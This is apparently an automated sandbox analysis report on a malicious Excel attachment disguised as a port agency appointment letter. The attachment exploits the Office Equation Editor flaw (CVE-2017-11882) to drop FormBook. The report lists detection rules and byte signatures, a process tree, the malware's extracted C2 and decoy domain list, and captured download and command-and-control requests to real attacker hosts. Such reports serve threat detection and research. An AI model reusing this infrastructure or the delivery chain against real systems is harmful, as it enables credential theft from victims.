Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx

Overview

General Information

Sample Name:Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx
Analysis ID:433035
MD5:27211c2dc1809cc2ab4469ff246f9cb4
SHA1:735918b9ed26c5eafa266305fcf677bd2ee5f0a2
SHA256:b4b855d04e706c33129c2db1c80d8b05497fa56a2288ef2fb4e631fe42aa781f
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2508 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2988 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 3068 cmdline: 'C:\Users\Public\vbc.exe' MD5: 116E736BA00FCA4B8499C4DF00796454)
      • vbc.exe (PID: 2476 cmdline: 'C:\Users\Public\vbc.exe' MD5: 116E736BA00FCA4B8499C4DF00796454)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • raserver.exe (PID: 2204 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
            • cmd.exe (PID: 1664 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.oceancollaborative.com/bp3i/"], "decoy": ["bancambios.network", "centroufologicosiciliano.info", "personalloansonline.xyz", "xn---yado-8e4dze0c.site", "americanscientific.net", "5australiacl.com", "sportsiri.com", "harchain.com", "oakandivywedding.com", "getbattlevizion.com", "laurenamason.com", "middreampostal.com", "realityawarenetworks.com", "purpleqube.com", "reufhroir.com", "dr-farshidtajik.com", "spinecompanion.com", "grpsexportsandimports.com", "nodeaths.com", "indylead.com", "payplrif617592.info", "counteraction.fund", "t4mall.com", "lnbes.com", "5xlsteve.com", "kocaelimanliftkiralama.site", "jacksonmesser.com", "nicehips.xyz", "accelerator.sydney", "dembyanndson.com", "tori2020.com", "ilium-partners.com", "amazingfinds4u.com", "therebelpartyband.com", "mutanterestaurante.com", "underce.com", "foldarusa.com", "canyoufindme.info", "fewo-zweifall.com", "fredrika-stahl.com", "bankalmatajer.com", "themindsetbreakthrough.com", "kesat-ya10.com", "9wsc.com", "jimmymasks.com", "bluebeltpanobuy.com", "my-ela.com", "motivactivewear.com", "myrivercityhomeimprovements.com", "xn--2o2b1z87x8sb.com", "pholbhf.icu", "8ballsportsbook.com", "doodstore.net", "shenghui118.com", "glavstore.com", "mydystopianlife.com", "woodlandsceinics.com", "trickshow.club", "vitali-tea.online", "thechandeck.com", "blinbins.com", "mcgcompetition.com", "xrglm.com", "mikefling.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 22 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vbc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vbc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        4.2.vbc.exe.9760000.7.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.vbc.exe.9760000.7.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2988, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2988, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3068
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2988, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3068

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.oceancollaborative.com/bp3i/"], "decoy": ["bancambios.network", "centroufologicosiciliano.info", "personalloansonline.xyz", "xn---yado-8e4dze0c.site", "americanscientific.net", "5australiacl.com", "sportsiri.com", "harchain.com", "oakandivywedding.com", "getbattlevizion.com", "laurenamason.com", "middreampostal.com", "realityawarenetworks.com", "purpleqube.com", "reufhroir.com", "dr-farshidtajik.com", "spinecompanion.com", "grpsexportsandimports.com", "nodeaths.com", "indylead.com", "payplrif617592.info", "counteraction.fund", "t4mall.com", "lnbes.com", "5xlsteve.com", "kocaelimanliftkiralama.site", "jacksonmesser.com", "nicehips.xyz", "accelerator.sydney", "dembyanndson.com", "tori2020.com", "ilium-partners.com", "amazingfinds4u.com", "therebelpartyband.com", "mutanterestaurante.com", "underce.com", "foldarusa.com", "canyoufindme.info", "fewo-zweifall.com", "fredrika-stahl.com", "bankalmatajer.com", "themindsetbreakthrough.com", "kesat-ya10.com", "9wsc.com", "jimmymasks.com", "bluebeltpanobuy.com", "my-ela.com", "motivactivewear.com", "myrivercityhomeimprovements.com", "xn--2o2b1z87x8sb.com", "pholbhf.icu", "8ballsportsbook.com", "doodstore.net", "shenghui118.com", "glavstore.com", "mydystopianlife.com", "woodlandsceinics.com", "trickshow.club", "vitali-tea.online", "thechandeck.com", "blinbins.com", "mcgcompetition.com", "xrglm.com", "mikefling.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exeReversingLabs: Detection: 28%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 28%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxVirustotal: Detection: 25%Perma Link
          Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxReversingLabs: Detection: 21%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exeJoe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.vbc.exe.9760000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.raserver.exe.2477960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.2.raserver.exe.739160.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 5.1.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000005.00000002.2193897914.0000000000740000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: vbc.exe, 00000005.00000002.2193897914.0000000000740000.00000040.00000001.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040263E FindFirstFileA,
          Source: excel.exeMemory has grown: Private usage: 4MB later: 60MB
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop esi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop ebx
          Source: global trafficDNS query: name: www.reufhroir.com
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.210.173.40:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.210.173.40:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 192.210.173.40:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 217.70.184.50:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 217.70.184.50:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 217.70.184.50:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 67.199.248.12:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 67.199.248.12:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 67.199.248.12:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.oceancollaborative.com/bp3i/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 11 Jun 2021 06:03:41 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Thu, 10 Jun 2021 15:14:59 GMTETag: "36f99-5c46adac1699a"Accept-Ranges: bytesContent-Length: 225177Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 b8 84 3a 75 d9 ea 69 75 d9 ea 69 75 d9 ea 69 b6 d6 b5 69 77 d9 ea 69 75 d9 eb 69 ee d9 ea 69 b6 d6 b7 69 64 d9 ea 69 21 fa da 69 7f d9 ea 69 b2 df ec 69 74 d9 ea 69 52 69 63 68 75 d9 ea 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 e3 1a 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d4 01 00 00 04 00 00 3c 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 c0 02 00 00 0a 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /bp3i/?k48p3Xk8=UA97/2DMKKyqmOEzj5VkqIpiqoWZJQJaus3zswYLrPQqMJGDrodJLRvFW8FHFce0tipUDw==&e6A=3fptojvPVN1xy HTTP/1.1Host: www.spinecompanion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?k48p3Xk8=/O9fLU9aKIl5h5wJhcQBjfSEDJBN8B2QQZuj7hhytBKbSIIxNnTjzWGkziBiUBwkg6nLBQ==&e6A=3fptojvPVN1xy HTTP/1.1Host: www.doodstore.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 217.70.184.50 217.70.184.50
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: global trafficHTTP traffic detected: GET /files/loader1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.173.40Connection: Keep-Alive
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E25AB663.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /files/loader1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.173.40Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bp3i/?k48p3Xk8=UA97/2DMKKyqmOEzj5VkqIpiqoWZJQJaus3zswYLrPQqMJGDrodJLRvFW8FHFce0tipUDw==&e6A=3fptojvPVN1xy HTTP/1.1Host: www.spinecompanion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?k48p3Xk8=/O9fLU9aKIl5h5wJhcQBjfSEDJBN8B2QQZuj7hhytBKbSIIxNnTjzWGkziBiUBwkg6nLBQ==&e6A=3fptojvPVN1xy HTTP/1.1Host: www.doodstore.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: unknownDNS traffic detected: queries for: www.reufhroir.com
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
